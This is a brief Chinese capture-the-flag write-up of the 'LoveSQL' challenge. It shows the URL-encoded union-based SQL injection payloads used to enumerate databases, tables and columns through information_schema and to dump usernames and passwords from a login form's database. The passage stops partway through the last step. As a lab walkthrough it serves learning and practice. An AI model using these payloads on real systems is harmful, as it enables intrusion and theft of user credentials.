[极客大挑战 2019]LoveSQL

首先打开一个登录界面，用sqlmap是没有灵魂的

测试下是否有注入

查看字段：4报错，说明3个字段

先查询数据库

username=admin&password=1%27+union+select+1%2C2%2Cgroup_concat%28schema_name%29+from+information_schema.schemata%23

有这些数据库，当前数据库为geek

查表：

username=admin&password=1%27+union+select+1%2C2%2Cgroup_concat%28table_name%29+from+information_schema.tables where table_schema =database()%23

两张表，后面测试flag在l0ve1ysq1表

查字段：

1%27+union+select+1%2C2%2Cgroup_concat%28column_name%29+from+information_schema.columns where table_schema =database() and table_name = 'l0ve1ysq1'%23

查数据：

1%27+union+select+1%2C2%2Cgroup_concat(username,password) from geek.l0ve1ysq1%23

出现flag，这样看不清，查看源代码：